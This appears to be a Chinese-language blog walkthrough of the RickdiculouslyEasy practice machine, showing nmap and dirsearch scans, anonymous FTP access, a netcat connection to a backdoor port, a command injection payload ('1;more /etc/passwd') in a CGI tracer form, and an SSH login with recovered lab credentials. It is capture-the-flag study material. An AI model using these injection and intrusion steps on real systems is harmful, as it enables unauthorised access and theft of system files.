靶机入侵

Rxw
  2024-08-08 02:47:12 2024-08-08 02:47:12 Created   2024-12-02 16:42:10 2024-12-02 16:42:10 Updated      463 Words  2 Mins  

rickdiculouslyeasy

端口扫描

nmap -sT -A -p1-65535 -T4 -O -sV 192.168.100.129

21

──(root㉿mykali)-[/home/rxwkail/Desktop]
└─# ftp 192.168.100.129
Connected to 192.168.100.129.
220 (vsFTPd 3.0.3)
Name (192.168.100.129:rxwkail): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||45948|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
229 Entering Extended Passive Mode (|||46305|)
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
100% |***************************|    42        0.39 KiB/s    00:00 ETA
226 Transfer complete.
42 bytes received in 00:00 (0.38 KiB/s)
ftp> exit
221 Goodbye.                                                                        
┌──(root㉿mykali)-[/home/rxwkail/Desktop]
└─# ls
FLAG.txt                                                                          
┌──(root㉿mykali)-[/home/rxwkail/Desktop]
└─# cat FLAG.txt                          
FLAG{Whoa this is unexpected} - 10 Points

13337

13337/tcp open  unknown
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points

9090

9090/tcp  open  http       Cockpit web service 161 or earlier
|_http-title: Did not follow redirect to https://192.168.100.129:9090/
FLAG {There is no Zeus, in your face!} - 10 Points

60000

60000/tcp open  tcpwrapped
|_drda-info: ERROR
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
──(root㉿mykali)-[/home/rxwkail/Desktop]
└─# nc 192.168.100.129 60000                        
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points

目录扫描

./dirsearch.py -u http://192.168.100.129

http://192.168.100.129/passwords/

Morty's Website Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need. ### http://192.168.100.129/robots.txt 
They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*

http://192.168.100.129/cgi-bin/tracertool.cgi

MORTY’S MACHINE TRACER MACHINE
Enter an IP address to trace.


任意语句漏洞:1;more /etc/passwd


ssh登入:ssh -p 22222 Summer@ 192.168.100.129


Summer@192.168.100.129‘s password: winter


		


		
		

			

    
    
        
  • Title: 靶机入侵
    • 
        
  • Author: Rxw
    • 
        
  • Created at
                : 2024-08-08 02:47:12
    • 
        
            
  • 
                Updated at
                    : 2024-12-02 16:42:10
            
    • 
        
        
  • 
            Link: https://rxw2023-github-io.pages.dev/2024/08/08/靶机入侵/
        
    • 
        
  • 
            
                License:
            
            

            
                This work is licensed under CC BY-NC-SA 4.0.
            
        
    • 
    




		

		

		
		
		

		

		
		

			
			

				
			

			
			
			

				
			

			
		

		


		
		

			

    

    

        Comments
    

    

        
            
    

    


        
    



		

		
	


	
	

		

	

		
On this page

		
靶机入侵

		
  1. rickdiculouslyeasy
    1. 端口扫描
    2. 目录扫描